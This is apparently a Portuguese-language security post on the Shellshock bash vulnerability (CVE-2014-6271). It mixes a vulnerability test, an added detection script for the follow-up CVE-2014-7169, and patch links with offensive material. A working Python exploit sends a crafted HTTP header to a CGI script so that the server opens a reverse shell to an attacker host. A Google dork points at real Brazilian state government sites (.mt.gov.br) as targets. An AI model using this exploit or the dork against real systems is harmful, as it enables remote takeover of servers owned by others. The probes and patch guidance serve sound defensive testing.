### GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.
### Who has confirmed it?
Red Hat Bugzilla #1141597 (CONFIRM, patch information): https://bugzilla.redhat.com/show_bug.cgi?id=1141597
Red Hat Security Blog, 24 Sep 2014, "Bash specially-crafted environment variables code injection attack" (CONFIRM): https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
### Testing the vulnerability:

```shell
root@sefaz:~ # env x='() { :;}; echo vulneravel' sh -c "echo isso eh um teste"
vulneravel
isso eh um teste
```

If the line `vulneravel` is printed before the test message, the bash binary is vulnerable: the command appended after the function body was executed while bash imported the variable, before `-c` ran at all. Run the probe with `bash -c` explicitly; `sh -c` only proves something where /bin/sh is bash (on Debian and Ubuntu it is dash, which does not import functions from the environment and will never print the marker). A clean result here covers CVE-2014-6271 only; the first round of patches was incomplete, and the follow-up CVE-2014-7169 needs its own check.
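A more careful version of that check, added here as an example (it is not part of the original post): it first verifies that the binary under test really is bash, so a dash `/bin/sh` is reported as "not-bash" instead of looking patched, then runs the CVE-2014-6271 probe from above, and then the CVE-2014-7169 probe that the first patches missed. The function name `shellshock_check` and its three result words are choices made for this example.

```shell
#!/bin/sh
# Added example, not from the original post: probe a shell binary for
# CVE-2014-6271 and for the CVE-2014-7169 follow-up, which the first round
# of patches did not cover. Prints one of: not-bash, vulnerable, patched.

shellshock_check() {
    shell="${1:-bash}"

    # Only bash imports functions from the environment. dash (Debian/Ubuntu
    # /bin/sh) or a missing binary leaves BASH_VERSION empty, and the probes
    # below would then report "patched" for the wrong reason.
    if [ -z "$("$shell" -c 'printf %s "$BASH_VERSION"' 2>/dev/null)" ]; then
        echo not-bash
        return 2
    fi

    # CVE-2014-6271: the text after the function body is executed as a
    # command while the variable is imported, before -c runs at all.
    if env x='() { :;}; echo vulnerable' "$shell" -c ':' 2>/dev/null | grep -q '^vulnerable$'; then
        echo vulnerable
        return 1
    fi

    # CVE-2014-7169: with only the first fix applied, a truncated definition
    # still confuses the parser so that "echo date" runs as ">echo date",
    # creating a file named "echo" in the current directory with date's output.
    tmp=$(mktemp -d) || return 3
    (cd "$tmp" && env X='() { (a)=>\' "$shell" -c 'echo date' >/dev/null 2>&1)
    if [ -e "$tmp/echo" ]; then
        rm -rf "$tmp"
        echo vulnerable
        return 1
    fi
    rm -rf "$tmp"
    echo patched
    return 0
}

# Stand-alone run: check both interpreters the one-liner above could hit.
for s in sh bash; do
    printf '%s: %s\n' "$s" "$(shellshock_check "$s")"
done
```

Exit status mirrors the printed word (0 patched, 1 vulnerable, 2 not-bash), so the function can be dropped into a fleet-wide check that collects results per host. The 7169 probe deliberately runs inside a throwaway directory because a vulnerable bash really does create a file there.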
### Attacking the application:

```python
#
# CVE-2014-6271 cgi-bin reverse shell
#
import http.client
import sys

if len(sys.argv) < 4:
    print("Usage: %s <host> <vulnerable CGI> <attackhost/port>" % sys.argv[0])
    print("Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0])
    sys.exit(0)

conn = http.client.HTTPConnection(sys.argv[1])

# Payload: an empty function body followed by the command bash executes while
# importing the variable; /dev/tcp/<host>/<port> is bash's built-in TCP client,
# so the shell connects back to the attacker's listener.
reverse_shell = "() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

# Any request header reaches the CGI script as an environment variable
# (this one becomes HTTP_TEST), which is exactly where vulnerable bash parses it.
headers = {"Content-type": "application/x-www-form-urlencoded", "test": reverse_shell}
conn.request("GET", sys.argv[2], headers=headers)
res = conn.getresponse()
print(res.status, res.reason)
print(res.read().decode(errors="replace"))
```
### Google dork: inurl:cgi-bin/ or, filtered to Mato Grosso = inurl:cgi-bin site:.mt.gov.br :p
### POC Script: http://pastebin.com/kQ5ppEZD || https://github.com/rapid7/metasploit-framework/pull/3882
### Fix patches:
http://ftp.gnu.org/pub/gnu/bash/bash-3.0-patches/bash30-017
http://ftp.gnu.org/pub/gnu/bash/bash-3.1-patches/bash31-018
http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052
http://ftp.gnu.org/pub/gnu/bash/bash-4.0-patches/bash40-039
http://ftp.gnu.org/pub/gnu/bash/bash-4.1-patches/bash41-012
http://ftp.gnu.org/pub/gnu/bash/bash-4.2-patches/bash42-048
http://ftp.gnu.org/pub/gnu/bash/bash-4.3-patches/bash43-025
These are the upstream patches for CVE-2014-6271 only. They turned out to be incomplete (CVE-2014-7169 and further CVEs followed within days), so apply the full patch series for your bash branch, or simply your distribution's current bash package, and re-run the test afterwards.
More sources:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
http://anchisesbr.blogspot.com.br/2014/09/seguranca-bashpocalypse.html
http://www.pcworld.com/article/2687857/bigger-than-heartbleed-shellshock-flaw-leaves-os-x-linux-more-open-to-attack.html
Happy Hacking (-;